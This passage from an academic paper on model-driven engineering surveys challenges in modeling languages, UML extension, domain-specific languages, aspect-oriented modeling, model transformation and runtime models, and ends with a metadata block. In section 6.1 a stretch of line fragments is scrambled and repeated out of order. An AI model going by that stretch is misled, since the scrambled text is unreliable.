Other notable work in the domain-specific modeling vein is the work of Xactium on providing support for engineering domain-specific languages (see http://www.xactium.com), and the work at Vanderbilt University on the Generic Modeling Environment (GME) (see http://www.isis.vanderbilt.edu/projects/gme/). Both approaches are based on the MOF standard of MDA and provide support for building MOF-based definitions of domain-specific modeling languages. The MOF is used to build models, referred to as metamodels, that define the abstract syntax of modeling languages. While these approaches utilize MDA standards they do not necessarily restrict their modeling viewpoints to the CIM, PIM and PSM. The Xactium approach, in particular, is based on an adaptive tool framework that uses reflection to adapt a development environment as its underlying modeling language changes: If extensions are made to the modeling language the environment is made aware of it through reflection and can thus adapt.
A major MDE initiative from academia is Model Integrated Computing (MIC) [57]. The MIC initially started out with a focus on developing support for model driven development of distributed embedded real-time systems. There is now work taking place within the OMG to align the MIC and MDA initiatives (e.g., see http://mic.omg.org/).
5. Modeling Language Challenges
The following are two major challenges that architects of MDE modeling languages face:
- **The abstraction challenge**: How can one provide support for creating and manipulating problem-level abstractions as first-class modeling elements in a language?
- **The formality challenge**: What aspects of a modeling language’s semantics need to be formalized in order to support formal manipulation, and how should the aspects be formalized?
Two schools of thought on how to tackle the abstraction challenge have emerged in the MDE community:
- **The Extensible General-Purpose Modeling Language School**: The abstraction challenge is tackled by providing a base general-purpose language with facilities to extend it with domain-specific abstractions (i.e., abstractions that are specific to a problem domain).
- **The Domain Specific Modeling Language School**: The challenge is tackled by defining domain specific languages using meta-metamodeling mechanisms such as the OMG’s MOF. The focus of work in this area is on providing tool support for engineering modeling languages. The products of Xactium, MetaCase, and Microsoft provide examples of current attempts at producing such tools.
It is important to note that the research ideas, techniques and technologies from these two schools are not mutually exclusive. Extensible modeling languages and meta-metamodeling technologies can both play vital roles in an MDE environment. We envisage that research in both schools will provide valuable insights and research results that will lead to a convergence of ideas.
5.1. Learning from the UML Experience: Managing Language Complexity
“IT is easier to perceive error than to find truth, for the former lies on the surface and is easily seen, while the latter lies in the depth, where few are willing to search for it.” – Johann Wolfgang von Goethe
An extensible, general-purpose modeling language should provide, at least, (1) abstractions above those available at the code level that support a wide variety of concepts in known problem domains, and (2) language extension mechanisms that allow users to extend or specialize the language to provide suitable domain-specific abstractions for new application domains.
The Extensible Modeling Language school is exemplified by work on the UML. There are significant benefits to having a standardized extensible general-purpose modeling language such as the UML. For example, such a language facilitates communication across multiple application domains and makes it possible to train modelers that can work in multiple domains.
The UML is also one of the most widely critiqued modeling languages (e.g., see [22, 31]). Despite its problems, there is no denying that the UML standardization effort is playing a vital role as a public source of insights into problems associated with developing practical software modeling languages.
A major challenge that is faced by developers of extensible general-purpose modeling language is identifying a small base set of modeling concepts that can be used to express a wide range of problem abstractions. The UML standardization process illustrates the difficulty of converging on a small core set of extensible concepts. One of the
problems is that there is currently very little analyzable modeling experience that can be used to distill a small core of extensible modeling concepts. One way to address this problem is to set up facilities for collecting, analyzing and sharing modeling experience, particularly from industry. There are a number of initiatives that seek to develop and maintain a repository of modeling experience, for example PlanetMDE (see http://planetmde.org/) and REMODD (see http://lists.cse.msu.edu/cgi-bin/mailman/listinfo/remodd). Collecting relevant experience from industry will be extremely challenging. Assuring that Intellectual Property rights will not be violated and overcoming the reluctance of organizations to share artifacts for fear that analysis will reveal embarrassing problems are some of the challenging problems that these initiatives must address.
The complexity of languages such as the UML is reflected in their metamodels. Complex metamodels are problematic for developers who need to understand and use them. These include developers of MDE tools and transformations. The complexity of metamodels for standard languages such as the UML also presents challenges to the groups charged with evolving the standards [22]. An evolution process in which changes to a metamodel are made and evaluated manually is tedious and error prone. Manual techniques make it difficult to (1) establish that changes are made consistently across the metamodel, (2) determine the impact changes have on other model elements, and (3) determine that the modified metamodel is sound and complete. It is important that metamodels be shown to be sound and complete. Conformance mechanisms can then be developed and used by tool vendors to check that their interpretations of rules in the metamodel are accurate.
Tools can play a significant role in reducing the accidental complexities associated with understanding and using large metamodels. For example, a tool that extracts metamodel views of UML diagram types consisting only of the concepts and relationships that appear in the diagrams can help one understand the relationships between visible elements of a UML diagram. A more flexible and useful approach is to provide tools that allow developers to query the metamodel and to extract specified views from the metamodel. Query/Extraction tools should be capable of extracting simple derived relationships between concepts and more complex views that consist of derived relationships among many concepts. Metamodel users can use such tools to better understand the UML metamodel, and to obtain metamodel views that can be used in the specification of patterns and transformations. Users that need to extend or evolve the UML metamodel can also use such tools to help determine the impact of changes (e.g., a query that returns a view consisting of all classes directly or indirectly related to a concept to be changed in a metamodel can provide useful information) and to check that changes are consistently made across the metamodel. The development of such tools is not beyond currently available technologies. Current UML model development tools have some support for manipulating the UML metamodel that can be extended with query and extraction capabilities that are accessible by users.
Another useful tool that can ease the task of using the UML metamodel is one that takes a UML model and produces a metamodel view that describes its structure. Such a tool can be used to support compliance checking of models.
5.2. Learning from the UML Experience: Extending Modeling Languages
The UML experience provides some evidence that defining extension mechanisms that extend more than just the syntax of a language is particularly challenging. UML 2.0 supports two forms of extensions: Associating particular semantics to specified semantic variation points, and using profiles to define UML variants.
A semantic variation point is a semantic aspect of a model element that the UML allows a user to define. For example, the manner in which received events are handled by a state machine before processing is a semantic variation point for state machines: A modeler can decide to use a strict queue mechanism, or another suitable input handling mechanism. A problem with UML semantic variation points is that modelers are responsible for defining and communicating the semantics to model readers and tools that manipulate the models (e.g., code generators). UML 2.0 does not provide default semantics or a list of possible variations, nor does it formally constrain the semantics that can be plugged into variation points. This can lead to the following pitfalls: (1) Users can unwittingly assign a semantics that is inconsistent with the semantics of related concepts; and (2) failure to communicate a particular semantics to model readers and tools that analyze models can lead to misinterpretation and improper analysis of the models. The challenge here is to develop support for defining, constraining and checking the semantics plugged into semantic variation points.
Profiles are the primary mechanism for defining domain-specific UML variants. A UML profile describes how UML model elements are extended to support usage in a particular domain. For example, a profile can be used to define a variant of the UML that is suited for modeling J2EE software systems. UML model elements are extended using stereotypes and tagged values that define additional properties that are to be associated with the elements. The extension of a model element introduced by a stereotype must not contradict the properties associated with the model element. A profile is a lightweight extension mechanism and thus cannot be used to add new model elements or delete
existing model elements. New relationships between UML model elements can be defined in a profile though.
The OMG currently manages many profiles including the Profile for Schedulability, Performance and Time and a system modeling profile called SysML. Unfortunately, the UML 2.0 profile mechanism does not provide a means for precisely defining semantics associated with extensions. For this reason, profiles cannot be used in their current form to develop domain-specific UML variants that support the formal model manipulations required in an MDE environment. The XMF-Mosaic tool developed by Xactium takes a promising approach that is based on the use of meta-profiles and a reflective UML modeling environment that is able to adapt to extensions made to the UML.
5.3. Domain Specific Modeling Environments
A domain specific language consists of constructs that capture phenomena in the domain it describes. Domain specific languages (DSL) cover a wide range of forms [15]. A DSL may be used for communication between software components (e.g., XML-dialects), or it may be embedded in a wizard that iteratively asks a user for configuration information.
DSLs can help bridge the problem-implementation gap, but their use raises new challenges:
- Enhanced tooling challenge: Each DSL needs its own set of tools (editor, checker, analyzers, code generators). These tools will need to evolve as the domain evolves. Building and evolving these tools using manual techniques can be expensive. A major challenge for DSL researchers is developing the foundation needed to produce efficient meta-toolsets for DSL development.
- The DSL-Babel challenge: The use of many DSLs can lead to significant interoperability, language-version and language-migration problems. This problem poses its own challenges with respect to training and communication across different domains. DSLs will evolve and will be versioned and so must the applications that are implemented using the DSLs. Furthermore, different parts of the same system may be described using different DSLs and thus there must be a means to relate concepts across DSLs and a means to ensure consistency of concept representations across the languages. Sound integration of DSLs will probably be as hard to achieve as the integration of various types of diagrams in a UML model.
The developers responsible for creating and evolving DSL tools will need to have intimate knowledge of the domain and thus must closely interact with application developers. Furthermore, the quality of the DSL tools should be a primary concern, and quality assurance programs for the DSL tooling sector of an organization should be integrated with the quality assurance programs of the application development sectors. These are significant process and management challenges.
In addition to these challenges many of the challenges associated with developing standardized modeling languages apply to DSLs.
5.4. Developing Formal Modeling Languages
Formal methods tend to restrict their modeling viewpoints in order to provide powerful analysis, transformation and generation techniques. A challenge is to integrate formal techniques with MDE approaches that utilize modeling languages with a rich variety of viewpoints. A common approach is to translate a modeling view (e.g. a UML class model) to a form that can be analyzed using a particular formal technique (e.g., see [42]). For example, there are a number of approaches to transforming UML design views to representations that can be analyzed by model checking tools. Challenges here are, to (a) ensure that the translation is semantically correct, and (b) hide the complexities of the target formal language and tools from the modeler. Meeting the latter challenge involves automatically translating the analysis results to a form that utilizes concepts in the source modeling language.
Another approach would be to integrate the analysis/generation algorithms with the existing modeling language. This is more expensive, but would greatly enhance the applicability of an analysis tool to an existing modeling language.
In the formal methods community the focus is less on developing new formal languages and more on tuning existing notations and techniques. MDE languages provide a good context for performing such tuning.
5.5. Analyzing Models
If models are the primary artifacts of development then one has to be concerned with how their quality is evaluated. Good modeling methods should provide modelers with criteria and guidelines for developing quality models. These guidelines can be expressed in the form of patterns (e.g., Craig Larman’s GRASP patterns), proven rules of thumb (e.g., “minimize coupling, maximize cohesion”, “keep inheritance depth shallow”), and exemplar models. The reality is that modelers ultimately rely on feedback from experts to determine “goodness” of their models. For example, in classrooms the instructors play the role of expert modelers
and students are apprentices. From the student perspective, the grade awarded to a model reflects its “goodness”. The state of the practice in assessing model quality provides evidence that modeling is still in the craftsmanship phase.
Research on rigorous assessment of model quality has given us a glimpse of how we can better evaluate model quality. A number of researchers are working on developing rigorous static analysis techniques that are based on well-defined models of behaviors. For example, there is considerable work on model-checking of modeled behavior (e.g., see [39]).
Another promising area of research is systematic model testing. Systematic code testing involves executing programs on a select set of test inputs that satisfy some test criteria. These ideas can be extended to the modeling phases when executable forms of models are used. Model testing is concerned with providing modelers with the ability to animate or execute the models they have created in order to explore the behavior they have modeled.
The notion of model testing is not new. For example, SDL (Specification and Description Language) tools provide facilities for exercising the state-machine based models using an input set of test events. Work on executable variants of the UML also aims to provide modelers with feedback on the adequacy of their models. More recently a small, but growing, number of researchers have begun looking at developing systematic model testing techniques. This is an important area of research and helps pave the way for more effective use of models during software development.
There may be lessons from the systematic code testing community that can be applied, but the peculiarities of modeling languages may require the development of innovative approaches. In particular, innovative work on defining effective test criteria that are based on coverage of model elements and on the generation of model-level test cases that provide desired levels of coverage is needed.
The ability to animate models can help one better understand modeled behavior. Novices and experienced developers will both benefit from the visualization of modeled behavior provided by model animators. Model animation can provide quick visual feedback to novice modelers and can thus help them identify improper use of modeling constructs. Experienced modelers can use model animation to understand designs created by other developers better and faster.
It may also be useful to look at how other engineering disciplines determine the quality of their models. Engineers in other disciplines typically explore answers to the following questions when determining the adequacy of their models: Is the model a good predictor of how the physical artifact will behave? What are the assumptions underlying the model and what impact will they have on actual behavior? The answer to the first question is often based on evidence gathered from past applications of the model. Evidence of model fidelity is built up by comparing the actual behavior of systems built using the models with the behavior predicted by the models. Each time engineers build a system the experience gained either reinforces their confidence in the predictive power of the models used or the experience is used to improve the predictive power of models. Answers to the second question allow engineers to identify the limitations of analysis carried out using the models and develop plans for identifying and addressing problems that arise when the assumptions are violated.
Are similar questions applicable to software models? There are important differences between physical and software artifacts that one needs to take into consideration when applying modeling practices in other engineering disciplines to software, but there may be some experience that can be beneficially applied to software modeling.
6. Supporting Separation of Design Concerns
Developers of complex software face the challenge of balancing multiple interdependent, and sometimes conflicting, concerns in their designs. Balancing pervasive dependability concerns (e.g., security and fault tolerance concerns) is particularly challenging: The manner in which one concern is addressed can limit how other concerns are addressed, and interactions among software features that address the concerns can give rise to undesirable emergent behavior. Failure to identify and address faults arising from interacting dependability features during design can lead to costly system failures. For example, the first launch of the space shuttle Columbia was delayed because “(b)ackup flight software failed to synchronize with primary avionics software system” (see http://science.ksc.nasa.gov/shuttle/missions/sts-1/mission-sts-1.html). In this case, features that were built in to address fault-tolerance concerns did not interact as required with the primary functional features. Design modeling techniques should allow developers to separate these features so that their interactions can be analyzed to identify faulty interactions and to better understand how emergent behavior arises.
Modeling frameworks such as the MDA advocate modeling systems using a fixed set of viewpoints (e.g., the CIM, PIM, and PSM MDA views). Rich modeling languages such as the UML provide good support for modeling systems from a fixed set of viewpoints. Concepts used in a UML viewpoint are often dependent on concepts used in other viewpoints. For example, participants in a UML interaction diagram must have their classifiers (e.g., classes) defined in a static structural model. Such dependencies are
---
2In this paper, a feature is a logical unit of behavior.
specified in the language metamodel and thus the metamodel should be the basis for determining consistency of information across system views. Unfortunately, the size and complexity of the UML 2.0 metamodel makes it extremely difficult for tool developers and researchers to fully identify the dependencies among concepts, and to determine whether the metamodel captures all required dependencies. In the previous section we discussed the need for tools that query and navigate metamodels of large languages such as the UML. These tools will also make it easier to develop mechanisms that check the consistency of information across views.
The fixed set of viewpoints provided by current modeling languages and frameworks such as the MDA and UML are useful, but more is needed to tackle the complexity of developing software that address pervasive interdependent concerns. The need for better separation of concerns mechanisms arises from the need to analyze and evolve interacting pervasive features that address critical dependability concerns. A decision to modularize a design based on a core set of functional concerns can result in the spreading and tangling of dependability features in a design. The tangling of the features in a design complicates activities that require understanding, analyzing, evolving or replacing the crosscutting features. Furthermore, trade-off analysis tasks that require the development and evaluation of alternative forms of features are difficult to carry out when the features are tangled and spread across a design. These crosscutting features complicate the task of balancing dependability concerns in a design through experimentation with alternative solutions.
Modeling languages that provide support for creating and using concern-specific viewpoints can help alleviate the problems associated with crosscutting features. Developers can use a concern-specific viewpoint to create a design view that describes how the concern is addressed in a design. For example, developers can use an access control security viewpoint to describe access control features at various levels of abstraction.
A concern-specific viewpoint should, at least, consist of (1) modeling elements representing concern-specific concepts at various levels of abstractions, and (2) guidelines for creating views using the modeling elements. To facilitate their use, the elements can be organized as a system of patterns (e.g., access control patterns) or they can be used to define a domain-specific language (DSL) for the concern space. For example, a DSL for specifying security policies can be used by developers to create views that describe application-specific security policies. Supporting the DSL approach requires addressing the DSL challenges discussed in Section 5. Furthermore, the need to integrate views to obtain a holistic view of a design requires the development of solutions to the difficult problem of integrating views expressed in different DSLs. One way to integrate these views is to define a metamodel that describes the relationships among concepts defined in the different viewpoints. An interesting research direction in this respect concerns the use of ontologies to develop such metamodels. An ontology describes relationships among concepts in a domain of discourse. One can view a metamodel as an ontology and thus we should be able to leverage related work on integrating ontologies in work on integrating views described using different ontologies.
Another approach to supporting the definition and use of concept-specific viewpoints is based on the use of aspect-oriented modeling (AOM) techniques. These approaches describe views using general-purpose modeling languages and provide mechanisms for integrating the views. In this section we discuss the AOM approach in more detail and present some of the major challenges that must be met to realize its research goals.
6.1. Separating Concerns using Aspect Oriented Modeling Techniques
Work on separating crosscutting functionality at the programming level has led to the development of aspect-oriented programming (AOP) languages such as AspectJ [35]. Work on modeling techniques that utilize aspect concepts can be roughly partitioned into two categories: Those that provide techniques for modeling aspect-oriented programming (AOP) concepts [36], and those that provide requirements and design modeling techniques that tackle the problem of isolating features in modeling views and analyzing interactions across the views. Work in the first category focuses on modeling AOP concepts such as join points and advise using either lightweight or heavyweight extensions of modeling languages such as the UML (e.g., see [13, 37, 41, 56, 55]). These approaches lift AOP concepts to the design modeling level and thus ease the task of transforming design models to AOP programs. On the other hand, these approaches utilize concepts that are tightly coupled with program-level abstractions supported by current AOP languages.
Approaches in the second category (e.g., see [1, 5, 12, 23, 47]) focus more on providing support for separating concerns at higher levels of abstractions. We refer to approaches in this category as AOM approaches. The Theme approach and the AOM approach developed by the Colorado State University (CSU) AOM group exemplify work on AOM. In these approaches, aspects are views that describe how a concern is addressed in a design. These views are expressed in the UML and thus consist of one or more models created using the UML viewpoints.
The model elements in aspect and primary models provide partial views of design concepts. For example, a class
developing such an infrastructure are discussed in Section 7.2. The view
is not present. The challenges associated with de-
more complex if the necessary infrastructure for managing
models consisting of multiple interrelated views becomes
ware development process. Evolution and transformation
concerned with integrating AOM techniques into the soft-
MDE challenges related to providing support for manipu-
lating and managing models. The section also includes a
discussion on the use of models to support runtime activi-
features. Current composition techniques are based on rules for
syntactically matching elements across aspect and primary
models, which makes it possible to fully automate the com-
position. The matching rules use syntactic properties (e.g.,
model element name) to determine whether two model el-
ments represent the same concept or not. For example, a
matching rule stating that classes with the same name repre-
sent the same concept can be used to merge classes with the
same name but different attributes and operations. The com-
posed class will contain the union of the attributes and op-
érations found in the classes that are merged. This reliance
on an assumed correspondence between syntactic properties
and the concepts represented by model elements can lead to
conflict and other problems when it does not exist. There
is a need to take into consideration semantic properties, ex-
pressed as constraints or as specifications of behavior, when
matching model elements.
Consideration of semantic properties is also needed to
support verifiable composition. Composition is carried out
in a verifiable manner when it can be established that the
model it produces has specified properties. A composition
tool should be able to detect when it has failed to establish
or preserve a specified property and report this to the mod-
eler. Such checks cannot be completely automated, but it
may be possible to provide automated support for detecting
particular types of semantic conflicts and other interaction
problems.
Another major challenge faced by AOM researchers is
concerned with integrating AOM techniques into the soft-
ware development process. Evolution and transformation
of models consisting of multiple interrelated views becomes
more complex if the necessary infrastructure for managing
the views is not present. The challenges associated with de-
veloping such an infrastructure are discussed in Section 7.2.
6.2. Related Research on Requirements
Views and Feature Interactions
Work on requirements and architecture viewpoints [52],
and on the feature interaction problem [11] can provide
valuable insights that can be used to understand the chal-
enges of separating design concerns and of analyzing in-
teractions. The terms views and viewpoints tend to be as-
associated with work on requirements analysis, but they can
also be applied to designs. A design concern such as access
control can be considered to be a design viewpoint. Such a
viewpoint can provide concepts, patterns or a language that
can be used to create design views that describe features
addressing the design concern.
Work on feature interactions has tended to focus on fea-
tures that provide services of value to software users. For
example, in the telecommunication industry a feature is a
telecommunication service such as call-forwarding, and re-
search on the feature interaction problem in this domain is
concerned with identifying undesirable emergent behaviors
that arise when these services interact. There is a growing
realization that the feature interaction problem can appear
in many forms in software engineering. The problem of
analyzing interactions among features that address depend-
ability and other design concerns is another variant of the
feature interaction problem. One can also consider work on
analyzing interactions across views as a form of the feature
interaction problem.
Collaborative research involving members from the
AOM, the formal methods, the feature interaction and the
viewpoint analysis communities is needed to address the
challenging problems associated with separating concerns
and integrating overlapping views.
7. Manipulating Models
Current MDE technologies provide basic support for
storing and manipulating models. Environments typically
consist of model editors which can detect some syntactic in-
consistencies, basic support for team development of mod-
els, and limited support for transforming models. Much
more is needed if MDE is to succeed. For example, there
is a need for rigorous transformation modeling and analy-
ysis techniques, and for richer repository-based infrastruc-
tures that can support a variety of model manipulations,
can maintain traceability relationships among a wide range
of models, and can better support team based development
of models. In this section we discuss some of the major
MDE challenges related to providing support for manipu-
lating and managing models. The section also includes a
discussion on the use of models to support runtime activi-
ties.
7.1. Model Transformation Challenges
A (binary) model transformation defines a relationship between two sets of models. If one set of models is designated as a source set and the other as a target set then a mechanism that implements such a transformation will take the source set of models and produce the target set of models. These are called operational transformations in this paper. Model refinement, abstraction, and refactoring are well-known forms of operational transformations. Other forms that will become more widely used as MDE matures are (1) model composition in which the source models representing different views are used to produce a model that integrates the views, (2) model decomposition in which a single model is used to produce multiple target models, and (3) model translation in which a source set of models are transformed to target models expressed in a different language. In particular, model translations are used to transform model created for one purpose to models that are better suited for other purposes. Examples of translations can be found in work on transforming UML models to artifacts that can be formally analyzed using existing analysis tools. This include work on transforming UML to formal specification languages such as Z and Alloy, to performance models, and to state machine representations that can be analyzed by existing model checkers.
Transformations can also be used to maintain relationships among sets of models: Changes in the models in one set trigger changes in the other sets of models in order to maintain specified relationships. These synchronization transformations are used to implement change synchronization mechanisms in which changes to a model (e.g., a detailed UML design model) trigger corresponding changes in related artifacts (e.g., code generated from the UML design model).
Research on model transformations is still in its infancy and there is very little experience that can be used to determine the worth of current approaches. The OMG’s Query, View, Transformation (QVT) standard defines three types of transformation languages: two declarative languages that describe relations at different levels of abstraction, and an operational transformation language that describes transformations in an imperative manner. In addition to the QVT, there is a number of other proposals for transformation languages. An informative survey of transformation language features can be found in the paper by Czarnecki [16].
More research is needed on analyzing model transformations. The complex structure of models poses special challenges in this respect. As mentioned previously, a model is a collection of interrelated views. The following are some of the difficult research questions that arise from the multi-view nature of models:
- How does one maintain consistency across views as they are transformed? Synchronization transformation technologies may be used here to “ripple” the results of transformations to related views.
- How can transformations be tested? The complex structure of the models may stretch the limits of current formal static analysis and testing techniques. For testing techniques, the complex structures make definition of oracles and effective coverage criteria particularly challenging.
A particular challenge faced by developers of model-to-code transformations is integrating generated code with handcrafted or legacy code. Current code generation tools assume that generated code is stand-alone and provide very little support for integration of foreign code. Integrating foreign and generated code is easier if they are architecturally compatible. Unfortunately, current code generators do not make explicit the architectural choices that are made by the generators when they produce code and provide very limited support for affecting those choices. This makes it difficult to guarantee that a code generator will produce code that is architecturally compatible with foreign code. The result is that some refactoring of the generated and foreign code may be needed, or a separate “glue” interface needs to be developed. It may be possible to generate the needed refactoring steps or the “glue” code given appropriate information about the foreign and generated code. Research on techniques for generating these artifacts will have to determine the needed information.
7.2. Model Management Challenges
In a project, many models at varying levels of abstractions are created, evolved, analyzed and transformed. Manually tracking the variety of relationships among the models (e.g., versioning, refinement, realization and dependency relationships) adds significant accidental complexity to the MDE development process. Current modeling tools do not provide the support needed to effectively manage these relationships.
An MDE repository must have the capability to store models produced by a variety of development tools, and must be open and extensible in order to support a close approximation of the MDE vision. The repository should (1) allow tools from a variety of vendors to manipulate the models, (2) monitor and audit the model manipulations, and (3) automatically extract information from the audits and use it to establish, update or remove relationships among models. Developing such a repository requires addressing difficult technical problems. Problems associated with maintaining artifact traceability relationships are notoriously challenging and two decades of research on these problems have not produced convenient solutions.
Research in the area of Mega-Modeling, in which models are the units of manipulation, targets the problems associated with managing and manipulating models [9]. Metamodels play a critical role in mega-modeling: Mechanisms that manipulate models work at the metamodel level and information about artifacts stored in a repository can be captured in their metamodels.
Metamodels need to define more than just the abstract syntax of a language if they are to support model management tools. For example, the UML 2.0 metamodel is a class model in which the classes have get, set and helper functions that are used only to specify the abstract syntax and well-formedness rules. Metamodels should be able to use the full power of modeling languages to define both syntactic and semantic aspects of languages. For example, one can define semantics that determine how models in a language are to be transformed by including supporting operations in the metamodel. Furthermore, the metamodel does not have to consist only of a class model. One can use behavioral models (e.g., activity and sequence models) to describe the manipulations that can be carried out on models.
Tools that manipulate models can be associated with metamodels that describe how manipulations are implemented. This information can be used by MDE model management environments to extract information needed to maintain relationships among models that are manipulated by the tools. The KerMeta tool is an example of a new generation of MDE tools that allows one to extend metamodels with operations defining model manipulations [45, 61].
7.3. Supporting the use of Models During Runtime: Opportunities and Challenges
Examples of how the runtime models can be used by different system stakeholders are given below:
- System users can use runtime models to observe the runtime behavior when trying to understand a behavioral phenomenon (e.g., understanding the conditions under which transaction bottlenecks occur in a system), and to monitor specific aspects of the runtime environment (e.g., monitoring patterns of access to highly-sensitive information).
- Adaptation agents can use runtime models to detect the need for adaptation and to effect the adaptations. Effecting an adaption involves making changes to models of the parts to be adapted and submitting the changes to an adaptation mechanism that can interpret and perform the needed adaptations. Here it is assumed that the adaptations to be performed are pre-determined.
- In more advanced systems, change agents (maintainers or software agents) can use the runtime models to correct design errors or to introduce new features to a running system. Unlike adaptations, these changes are not pre-determined and thus the mechanisms used to effect the changes can be expected to be more complex. These more complex mechanisms will be able to support pre-determined adaptations as well as unanticipated modifications.
Research on providing support for creating and using runtime models is in its infancy. At the MODELS workshop on runtime models, Gordon Blair identified the following research questions: What forms should runtime models take? How can the fidelity of the models be maintained? What role should the models play in validation of the runtime behavior? These questions are good starting points for research in the area.
Providing support for changing behavior during runtime is particularly challenging. If models are to be used to effect changes to running software, research needs to focus on how the changes can be effected in a controlled manner. Allowing developers to change runtime behavior in an ad-hoc manner is obviously dangerous. A model-based runtime change interface will have to constrain how changes are effected and provide the means to check the impact of change before applying it to the running system.
8. Conclusions
In this paper we suggest that MDE research focus on providing technologies that address the recurring problem of bridging the problem-implementation gap. We also encourage research on the use of runtime models. The problems and challenges outlined in this paper are difficult to overcome, and it may seem that MDE techniques are more likely to contribute to the complexity of software development rather than manage inherent software complexity. It is our view that software engineering is inherently a modeling activity, and that the complexity of software will overwhelm our ability to effectively maintain mental models of a system. By making the models explicit and by using tools to manipulate, analyze and manage the models and their relationships, we are relieving significant cognitive burden and reducing the accidental complexities associated with maintaining mentally held models.
The web of models maintained in an MDE environment should be a reflection of inherent software complexity. Currently, creating software models is an art and thus models of faulty or convoluted solutions, and messy descriptions of relatively simple solutions can be expected. These modeling problems will give rise to accidental complexities.
There will always be accidental complexities associated with learning and using modeling languages and MDE tools to develop complex software. MDE technologists should
leverage accumulated experience and insights gained from failed and successful applications of previous MDE technologies to develop new technologies that reduce the accidental complexities of the past.
To conclude the paper we present a vision of an MDE environment that, if realized, can conceivably result in order-of-magnitude improvement in software development productivity and quality. The vision is intentionally ambitious and may not be attainable in its entirety. Progressively closer approximations of the vision will have increasingly significant effects on the effort required to develop complex software. In this sense, the vision can act as a point of reference against which MDE research progress can be informally assessed.
In the MDE vision, domain architects will be able to produce domain specific application development environments (DSAEs) using what we will refer to as MDE technology frameworks. Software developers will use DSAEs to produce and evolve members of an application family. A DSAE consists of tools to create, evolve, analyze, and transform models to forms from which implementation, deployment and runtime artifacts can be generated. Models are stored in a repository that tracks relationships across modeled concepts and maintains metadata on the manipulations that are performed on models.
Some of the other features that we envisage will be present in a DSAE are (1) mechanisms supporting for round-trip engineering, (2) mechanisms for synchronizing models at different levels of abstraction when changes are made at any level, and (3) mechanisms for integrating generated software with legacy software. Developers should also be able to use mechanisms in the DSAE to incorporate software features supporting the generation and use of runtime models.
Realizing the MDE vision of software engineering is a wicked problem and thus MDE environments that lead to order-of-magnitude improvements in software productivity and quality are not likely to appear in the near to medium-term - barring new insights that could lead to significant improvement in the rate at which pertinent technologies are developed. The current limitations of MDE technologies reflect inadequacies in our understanding of the software modeling phenomenon. The development and application of progressively better MDE technologies will help deepen our understanding and move us closer to better approximations of the MDE vision.
Acknowledgments: Robert France’s work on this paper was supported by a Lancaster University project VERA: Verifiable Aspect Models for Middleware Product Families, funded by the UK Engineering and Physical Sciences Research Council (EPSRC) Grant EP/E005276/1. This work is also partly undertaken within the MODELPLEX project funded by the EU under the IST Programme. The authors thank the editors and following persons for their valuable feedback on drafts of the paper: Nelly Bencomo, Gordon Blair, Betty Cheng, Tony Clarke, Steve Cook, Andy Evans, Awais Rashid, Bran Selic, Richard Taylor, Laurie Tratt.
References
|
{"Source-Url": "http://www.cs.colostate.edu/~france/publications/francer-MDD.pdf", "len_cl100k_base": 13922, "olmocr-version": "0.1.50", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 51968, "total-output-tokens": 16373, "length": "2e13", "weborganizer": {"__label__adult": 0.0003445148468017578, "__label__art_design": 0.00033092498779296875, "__label__crime_law": 0.0002543926239013672, "__label__education_jobs": 0.00115966796875, "__label__entertainment": 4.494190216064453e-05, "__label__fashion_beauty": 0.00015294551849365234, "__label__finance_business": 0.0001984834671020508, "__label__food_dining": 0.0002808570861816406, "__label__games": 0.000469207763671875, "__label__hardware": 0.0005526542663574219, "__label__health": 0.000301361083984375, "__label__history": 0.00023603439331054688, "__label__home_hobbies": 7.2479248046875e-05, "__label__industrial": 0.00031447410583496094, "__label__literature": 0.0002543926239013672, "__label__politics": 0.00024962425231933594, "__label__religion": 0.00041866302490234375, "__label__science_tech": 0.005413055419921875, "__label__social_life": 7.241964340209961e-05, "__label__software": 0.003509521484375, "__label__software_dev": 0.984375, "__label__sports_fitness": 0.0002846717834472656, "__label__transportation": 0.0004954338073730469, "__label__travel": 0.0001931190490722656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 81009, 0.01332]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 81009, 0.6786]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 81009, 0.91791]], "google_gemma-3-12b-it_contains_pii": [[0, 3872, false], [3872, 9405, null], [9405, 14324, null], [14324, 19434, null], [19434, 25088, null], [25088, 30227, null], [30227, 35103, null], [35103, 40862, null], [40862, 45841, null], [45841, 51526, null], [51526, 57204, null], [57204, 62268, null], [62268, 67829, null], [67829, 73112, null], [73112, 78533, null], [78533, 78533, null], [78533, 81009, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3872, true], [3872, 9405, null], [9405, 14324, null], [14324, 19434, null], [19434, 25088, null], [25088, 30227, null], [30227, 35103, null], [35103, 40862, null], [40862, 45841, null], [45841, 51526, null], [51526, 57204, null], [57204, 62268, null], [62268, 67829, null], [67829, 73112, null], [73112, 78533, null], [78533, 78533, null], [78533, 81009, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 81009, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 81009, null]], "pdf_page_numbers": [[0, 3872, 1], [3872, 9405, 2], [9405, 14324, 3], [14324, 19434, 4], [19434, 25088, 5], [25088, 30227, 6], [30227, 35103, 7], [35103, 40862, 8], [40862, 45841, 9], [45841, 51526, 10], [51526, 57204, 11], [57204, 62268, 12], [62268, 67829, 13], [67829, 73112, 14], [73112, 78533, 15], [78533, 78533, 16], [78533, 81009, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 81009, 0.0]]}
|
olmocr_science_pdfs
|
